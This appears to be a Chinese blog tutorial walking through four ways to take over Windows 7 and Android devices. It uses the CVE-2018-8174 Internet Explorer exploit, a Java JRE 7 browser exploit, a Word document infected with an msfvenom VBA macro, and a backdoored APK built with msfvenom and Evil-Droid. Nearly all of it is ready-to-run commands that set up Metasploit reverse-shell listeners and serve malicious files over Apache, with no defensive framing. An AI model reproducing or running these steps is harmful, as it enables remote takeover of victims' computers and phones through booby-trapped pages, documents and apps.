利用0day-java环境-宏感染-安卓客户端进行渗透
一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是
一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell
0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。
CVE-2018-8174 漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打 开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在 2018 年 4 月 20 日早上 确认此漏洞,并于 2018 年 5 月 8 号发布了官方安全补丁,对该 0day 漏洞进行了修复,并将其命名为 CVE-2018-8174。
1、安装 CVE-2018-8174_EXP
这里给出利用CVE-2018-8174_EXP的github地址
https://github.com/Yt1g3r/CVE-2018-8174_EXP
在kali上git下来
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
2、生成恶意 html 文件
打开readme文件,查看具体使用方式
在CVE-2018-8174_EXP目录下执行命令
python CVE-2018-8174.py -u http://IP地址/exploit.html -o exp.rtf -i IP -p 端口
注意文件是生成在当前目录,我们需要把它移到apache服务的目录下
mv exploit.html exp.rtf /var/www/html
打开apache服务
systemctl start apache2
使用metasploit打开监听
msfdb run
use exploit/multi/handlerd
set lhost IP地址
set payload windows/shell/reverse_tcp
run
在Windows7中用IE浏览器打开网站
http://IP/exploit.html
此时kali已拿到了目标的管理员权限
二、基于 java 环境的漏洞利用获取 shell
使用kali打开metasploit监听
use exploit/multi/browser/java_jre17_driver_manager
run
在Windows7上安装对应的JAVA版本
这里给出相应地Java安装包
jre-7u17-windows-i586-系统安全文档类资源-CSDN下载
安装过程不多赘述,按照默认选项安装即可。
安装完成后,按照kali上的地址在浏览器中访问
访问后出现如此界面
选择LATER, 如果选择UPDATE,漏洞将被修复。
跳转后,勾选“接受”,然后选择运行,如果取消就不会获得权限
运行后,kali已经获得了win7的权限
三、利用宏感染 word 文档获取 shell
使用msfvenom生成宏病毒
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -e x86/shikata_ga_nai -i 10 -f vba-exe
复制红框中的内容,这是宏语言的内容
新建一个word文档,打开“视图”工具栏,选择“宏”
填写“宏名”后,选择“创建”
将复制的内容粘贴到代码框中
保存后返回word文档,将payload内容粘贴到word文档中
红线一下都是
粘贴后保存关闭,再双击打开该文件,kali已经得到了管理员权限
四、安卓客户端渗透
通过 MSF 生成一个 apk 的后门应用
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 R > hack.apk
将它移到/var/www/html/目录下
mv hack.apk /var/www/html/
再Windows上下载,并在模拟器中安装再打开,kali即可获得权限
当然也可以下载到自己手机中,部分功能可用
给程序安装后门
首先禁用IPv6
echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.conf
sysctl -p
打开evil-droid文件
这里给大家准备了压缩包https://download.csdn.net/download/m0_47510703/78552314
cd Evil-Droid-master
我们需要修改一下evil-droid文件才能正常使用
vim evil-droid
修改第40行将“google.com”改为"baidu.com"
修改第649行将“-fa monaco”删去
退出保存即可。
然后为该文件添加执行去权限
chmod +x evil-droid
还要将tools文件夹下的apktool.jar替换为高版本
cp apktool_2.6.0.jar Evil-Droid-master/tools/apktool.jar
然后即可执行evil-droid文件
./evil-droid
它会自动为你下载需要的依赖,如果没有进行下载请更换一下源
选择3 ,IP地址和端口以及软件名称自定义即可,payload选择如下
然后选择需要使用的安装包即可
完成后会提示你apk所在的位置
点击“确定”后,会跳出如下界面,可以选择“确定”,也可以在msf中监听,这里我选择“exit”
我们再将安装包移到apache服务下,并再次开启apache
evil-droid结束后会自动关闭apache服务一定要再次手动开启
mv evilapk.apk /var/www/html
systemctl start apache2
下载好后,打开,kali'上即获得了对应权限
更多推荐
所有评论(0)